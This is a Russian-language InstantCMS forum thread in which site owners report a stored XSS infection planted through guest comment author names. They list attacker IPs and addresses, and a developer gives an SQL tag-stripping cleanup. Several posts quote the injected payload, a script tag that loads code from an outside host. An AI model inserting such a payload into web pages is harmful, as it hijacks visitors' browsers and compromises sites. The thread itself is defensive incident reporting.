Обнаружен вирус на некоторых сайтах instantcms!

Проверьте свои сайты!

 
Посетитель
no avatar
Медаль
Сообщений: 257
Может из-за скриптов рекламы (яндекс, гугл) или статистики
Посетитель
small user social cms
Сообщений: 11
Добрые люди подсказали, за что им особое спасибо, что в гостевом комментарии зараза жила.
В базе записан как
Код PHP:
  1. 'сергей <script src=\"//v1v.be/nb\">< /script>'
Реклама
cms
Посетитель
no avatar
МедальАвторитет форума
Сообщений: 2624
Дмитрий Ядов:

Добрые люди подсказали, за что им особое спасибо, что в гостевом комментарии зараза жила.
В базе записан как
Код PHP:
  1. 'сергей < /script>'

странно, разве движок не режет сам такую фигню, если она может быть опасной
Надежный быстрый хостинг
Посетитель
small user social cms
Медаль
Сообщений: 266
@Elv:
Как прибить скрипты в текстовых редакторах ?
Они прибиты - Обрабатывать типографом.
@Elv:
Премодерация постов с ссылками не помешала бы .
См. выше.
Речь шла о гостевом комментарии. Пожуём, увидим.
Посетитель
small user social cms
Сообщений: 16
Уже два раза за неделю меня яндекс выкидывает из выдачи из-за этих гостевых комментариев, вот из базы у себя вытащил строчки. можете сразу эти ip-адреса в черный список ставить. Не знаю как с этим бороться, отключить гостевые комментарии что ли.
сергей <script src="//v1v.be/nb"></script>', ' tyler979slatkin@mail.ru', '176.213.16.24
сергей <script src="//v1v.be/nb"></script>', ' harriett503mccarney@inbox.ru', '176.213.24.36
Посетитель
no avatar
Почетный донор проектаМедаль
Сообщений: 167
Друзья подскажите как в комментариях включить типограф.
Посетитель
small user social cms
Медаль
Сообщений: 125
В настройках компонента "комментарии->опции" снимите галку "Разрешить комментирование гостям"
Порою нужен сбой в системе, и шаг на ощупь в темноте. А иногда - побыть не с теми, чтоб наконец понять, кто - те.
Посетитель
small user social cms
Сообщений: 16
Друзья, вирус продолжает атаковать, еще два ip-адреса выявилось: 5.3.201.112, 5.164.195.135. Причем гостевые комментарии пустил через модерацию, вот на этой стадии и отлавливаю сейчас. А сегодня вирус уже регистрацию прошел на сайте, но пока ничего не нашел в результате регистрации. Комментарий с зарегистрированного пользователя был оставлен, но без вирусов пока что.
Надо что то думать с этим.
Редактировалось: 1 раз (Последний: 21 марта 2018 в 14:09)
InstantCMS Team
small user social cms
МедальАвторитет форумаКубок зрительских симпатий
Сообщений: 4161
Всё давно исправлено на github в очередной версии. Скоро будет обновление CMS.
Видео каталог для InstantCMS | Аудио каталог для InstantCMS | Мы Вконтакте | Предложение для спонсоров
Посетитель
small user social cms
Медаль
Сообщений: 723
@Elv:
В Демо это так и надо ?
Dr Web на демо не пускает
Посетитель
no avatar
Сообщений: 56
Добрый день, выловили вирус и у себя. Причем как в виде девушки так и в виде комментариев. Все потёрли, от яндекса пришел репорт, мол у вас пропала подмена родительской страницы, но как обезопасить себя на будущее?
InstantCMS Team
small user social cms
МедальАвторитет форумаКубок зрительских симпатий
Сообщений: 4161
@Mstislav:
но как обезопасить себя на будущее?
Я же написал. Проблему уже исправили, очень скоро будет обновление CMS.

А пока, можете воспользоваться вот такой "лечилкой" (это SQL, скопировать и вставить во вкладку sql в phpmyadmin)

Код SQL:
  1. DROP FUNCTION IF EXISTS icmsStripTags;
  2. DELIMITER |
  3. CREATE FUNCTION icmsStripTags( Dirty VARCHAR(100) )
  4. RETURNS VARCHAR(100)
  5. DETERMINISTIC
  6. BEGIN
  7. DECLARE iStart, iEnd, iLength INT;
  8. WHILE Locate( '<', Dirty ) > 0 AND Locate( '>', Dirty, Locate( '<', Dirty )) > 0 DO
  9. BEGIN
  10. SET iStart = Locate( '<', Dirty ), iEnd = Locate( '>', Dirty, Locate('<', Dirty ));
  11. SET iLength = ( iEnd - iStart) + 1;
  12. IF iLength > 0 THEN
  13. BEGIN
  14. SET Dirty = INSERT( Dirty, iStart, iLength, '');
  15. END;
  16. END IF;
  17. END;
  18. END WHILE;
  19. RETURN Dirty;
  20. END;
  21. |
  22. DELIMITER ;
  23.  
  24. UPDATE `cms_comments` SET `author_name` = icmsStripTags(author_name) WHERE `author_name` IS NOT NULL;
  25.  
  26. DROP FUNCTION icmsStripTags;
Редактировалось: 1 раз (Последний: 21 марта 2018 в 20:57)
Видео каталог для InstantCMS | Аудио каталог для InstantCMS | Мы Вконтакте | Предложение для спонсоров
Посетитель
no avatar
Сообщений: 56
Спасибо!
Посетитель
no avatar
Сообщений: 56
Еще айпишники нарушителя 176.213.4.44, 5.164.248.47, 176.59.38.217, 5.166.208.48, 5.164.248.30
Редактировалось: 3 раз (Последний: 26 марта 2018 в 11:12)
Посетитель
small user social cms
Медаль
Сообщений: 299
Спасибо за айпишники smile
Хостинг с очень удобной собственной Панелью управления, много настроек и его Преимущества. Бесплатный тест - 5 дней. Идеальное решение для сайтов на InstantCMS
В начало страницы
Предыдущая темаСледующая тема Перейти на форум:
Быстрый ответ
Чтобы писать на форуме, зарегистрируйтесь или авторизуйтесь.